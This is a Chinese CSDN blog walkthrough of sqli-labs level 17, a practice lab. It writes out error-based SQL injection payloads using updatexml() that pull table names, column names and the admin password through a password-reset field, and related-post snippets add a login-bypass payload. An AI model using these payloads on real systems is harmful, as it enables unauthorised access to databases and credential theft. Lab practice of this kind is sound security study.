sqli-labs关卡17(基于post提交的单引号闭合的报错盲注)通关思路

已于 2024-01-16 19:53:18 修改
阅读量402 收藏 1
点赞数 13
分类专栏: sqli-labs靶场 文章标签: 数据库 sql web安全
于 2023-11-11 22:18:13 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zyh1588/article/details/134353733
版权

文章目录

前言

此文章只用于学习和反思巩固sql注入知识,禁止用于做非法攻击。注意靶场是可以练习的平台,不能随意去尚未授权的网站做渗透测试!!!

一、回顾上一关知识点

上一关利用的是布尔盲注,通过页面successfully和failed两种状态来进行注入。

二、靶场第十四关通关思路

  • 1、判断注入点
  • 2、爆字段个数
  • 3、爆数据库名
  • 4、爆数据库表
  • 5、爆数据库列
  • 6、爆数据库关键信息

1、判断注入点

首先在页面发现与上一关不同的是有了[PASSWORD RESET] ,这个意思是密码重置。所以极大可能这一关是密码会与数据库交接,注入地方应该优先在password下手。因为是密码重置,那么肯定是要有自己的用户,这里我用admin用户来演示,也就是对admin用户进行密码重置。一般像修改密码、插入数据等操作都是无回显内容的,所以大概率是不能简单注入的。
注入语句为

1 and 1=1

1 and 1=2

发现页面并没有报错,提示密码重置成功,说明不是数字型。试一试1'发现页面出现报错,并且有报错信息为

You have an error in your SQL syntax; check the manual that
corresponds to your MySQL server version for the right syntax to use
near ‘admin’’ at line 1

可以发现是一个单引号闭合。
注意这里用and的原因是因为修改的密码是可控任意的是永真的。用or可能会短路。

2、爆字段个数

注入语句为

1' order by 3#

在这里插入图片描述
发现报错,说明有两个字段。

3、爆数据库名

注入语句为

1' and updatexml(1,concat(0x3a,(select database()),0x3a),1)#

在这里插入图片描述

4、爆数据库表

注入语句为

1' and updatexml(1,concat(0x3a,(select table_name from information_schema.tables where table_schema=database() limit 3,1),0x3a),1)#

在这里插入图片描述
得到关键数据库表名users

5、爆数据库列

注入语句为

1' and updatexml(1,concat(0x3a,(select column_name from information_schema.columns where table_schema=database() and table_name="users" limit 1,1),0x3a),1)#

1' and updatexml(1,concat(0x3a,(select column_name from information_schema.columns where table_schema=database() and table_name="users" limit 2,1),0x3a),1)#

在这里插入图片描述
在这里插入图片描述
得到关键数据库列username,password

6、爆数据库关键信息

注入语句为

1' and updatexml(1,concat(0x3a,(select password from users limit 0,1),0x3a),1)#

1' and updatexml(1,concat(0x3a,(select username from users limit 0,1),0x3a),1)#

发现并没有成功,报错信息为

You can’t specify target table ‘users’ for update in FROM clause

不能在 FROM 子句中指定目标表 ‘bd_bankaccbas’ 进行更新。我们就双select就行了
注入语句为

1' and updatexml(1,concat(0x3a,(select password from(select password from users where username='admin' limit 0,1)),0x3a),1)#

在这里插入图片描述

发现又报错

Every derived table must have its own alias

查了一下是每一个派生出来的表都必须给它命名一个自己的别名的意思,那么我们给他一个名字就好
注入语句最终为

1' and updatexml(1,concat(0x3a,(select password from(select password from users where username='admin' limit 0,1)mingzi),0x3a),1)#

在这里插入图片描述

总结

这一关是密码更新重置的报错注入,唯一不同的地方是后面查数据要用两次查询,还要给派生表命名。此文章是小白自己为了巩固sql注入而写的,大佬路过请多指教!

无名小卒且不会安全的zzyyhh
关注
  • 13
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
sqli-labs 17
m0_69548793的博客
08-27 1292
sqli-labs 17
sqli-labs配置数据库sqli-labs的数据库文件
03-09
Unable to connect to the database: security sqli-labs通过docker安装时,缺少数据库文件,可以通过这个sql文件直接安装
sqli-labs靶场17(基于post的更新查询报错注入)
qq_46527080的博客
12-18 694
知识点 updatexml()函数 updatexml()函数与extractvalue()类似,是更新xml文档的函数。 语法updatexml(目标xml文档,xml路径,更新的内容) updatexml(XML_document,XPath_string,new_value); 第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc 第二个参数:Xpath_String(Xpath格式的字符串) 第三个参数:new_value,String格式,替换查找到的符合条
详细sqli-labs(1-65)通关讲解
热门推荐
dreamthe的博客
05-17 12万+
​ 如果刚开始接触sql注入,那么sqli-labs这个靶场会很适合你,里面包含了很多的情景,以及我们在sql注入的时候遇到的阻碍。本章将1-65重点关卡进行详细讲解。代码基本上很全。如果靶场练习完了可以看我这篇SQL注入总结会更好掌握。​SQL注入非常详细总结_糊涂是福yyyy的博客-CSDN博客_sql注入数据包 ​...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
windows环境下安装sqli-labs
11-04
windows server 2012 环境下,安装sqli-labs的详细教程,适合新手小白,大神可以参考一下,有不足的地方请联系我。
jeakinscheung-sqli-labs-php7-master.zip
03-16
sqli创建数据库连接发现连接不了,这种原因是现在大部分人用的php7,原版的sqli只支持php5.
sqli-labs-----第17
wyzhxhn的博客
11-10 773
基于报错的更新查新。
基于Sqli-Labs靶场的SQL注入-17~22
Joker
01-03 1575
这一篇博客我主要讲了HTTP头部注入中的 UA、Referer、Cookie 注入以及 base-64编码。
sqli-labs第十七详解
金 帛的博客
04-26 3762
sqlilabs第十七详解
sqli-labs通关(十七)
qq_65950075的博客
05-05 560
这一跟前面的关卡都不一样,是全新的关卡,页面是一个密码重置页面,需要输入用户名,然后输入新的密码,就会把我们的旧密码替换掉。所以就会用到数据库的update更新数据,不再是前面的查询数据,所以之前的联合注入和布尔盲注以及时间盲注都不能用了。这里我们要用到之前使用过的报错注入。所以我们使用mid()函数来截取,因为是从32位开始不能看到,所以我们从第32位开始截取,截取后32位。这里要先输入正确的用户名,验证成功后才会把新密码替换,所以我们输入。但是回显并没有完全,因为报错回显只能回显32位。
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqli-labs第十七post-报错注入)
qq_42266432的博客
08-29 837
进入到十七后发现这有点不同,上面多了一行提示:密码重新设置,咱也不懂啥意思,在试了写常规注入的方法后,没有发现什么可以利用的点,于是决定去看看代码,虽然我不会php 先看这一部分有sql语句的: 从users表中搜索出uname和psw,条件和psw无,只看uname mysql_fetch_array()好像能返回键值对,而且除了将数据以数字索引方式储存在数组中之外,还可以将数据作为联索引储存,用字段名作为键名。 uname正确的话,再将users表中psw更新,条件等于刚刚输入的unam.
SQL-labs的第17——报错注入(updatexml)
qq_73393033的博客
07-20 402
这一的网站是用来修改密码的,所以数据库会执行update这种查询方式,而不是select这种查询方式。我们发现用户名这一框输入数据不行,会进行过滤。所以我们这次在密码这一框中进行注入。
superforming的sql-labs大通关之特殊关卡(十七)解析及注入方法
五分之一世纪
02-08 463
superforming的sql-labs大通关 第一部分(第1~10) 第二部分(第11~16) 第三部分(特殊的17) <1>特殊之处 (1)与之前关卡相比 1.在前十六sql-labs分别要用基于get数据传输方式的“联合查询”、“布尔盲注”、“时间盲注”、和基于post传输数据方式的“联合查询”、“布尔盲注”、“时间盲注”,而第十七第一次用了“报错注入”。观察源码就会发现调用了“mysql_erroe函数”与“print_r函数”将报错信息输出,所可以进行"报错注入"。【如
Sqlilabs-17
KAKA的博客
07-07 840
来到了 17 ,从这开始刚学习需要借助源码来配合学习,本学习内容是 update 内容 从源码中可以看到,开发者的意图流程是: 首先查询用户名相匹配的 users 表中 数据,所以这里如果需要注入首先得有一个在数据库中已经有了的用户名,若是现实挖掘漏洞过程中这,如果可以,可以先自己先注册一个,这下在数据库中就躺着了一个可利用的用户名和密码…,没有的话可以盲猜,如一般都有 admin guest等等可以直接利用的… 继续往下看源码,你会发现 username 身上加了个check_input,转到
sqli-labs靶场(1-22
weixin_51566481的博客
08-16 7326
sqli-labs,sql注入,burpsuit
sqli-labs第十七
yuqnqi的博客
05-09 258
查看源码,发现uname被检查了,passwd没有被检查 ,所以尝试使用通过passwd参数进行注入测试。
mysql事务(原理)
最新发布
m0_74347016的博客
05-19 305
mysql事务原理
sqli-labs通关28
03-05
sqli-labs是一个用于学习和练习SQL入的实验平台。通关28其中的一个关卡,下面是sqli-labs通关28的介绍: 在sqli-labs通关28中,你需要利用SQL注入漏洞来绕过登录验证,获取管理员权限。具体步骤如下: 1. 打开sqli-labs网站,找到通关28的页面。 2. 在登录框中输入任意用户名和密码,点击登录按钮。 3. 在URL中可以看到登录请求的参数,例如:`http://localhost/sqli-labs/Less-28/?id=1&Submit=Submit#`。 4. 在URL中的`id`参数处存在SQL注入漏洞,我们可以尝试利用这个漏洞进行攻击。 5. 输入`' or '1'='1`作为`id`参数的值,然后点击提交按钮。 6. 如果成功利用了SQL注入漏洞,你将会被认为是管理员身份登录成功,并且可以看到管理员的相信息。 请注意,sqli-labs是一个用于学习和练习SQL注入的平台,仅供合法目的使用。在实际应用中,SQL注入是一种严重的安全漏洞,需要谨慎对待。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

无名小卒且不会安全的zzyyhh

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值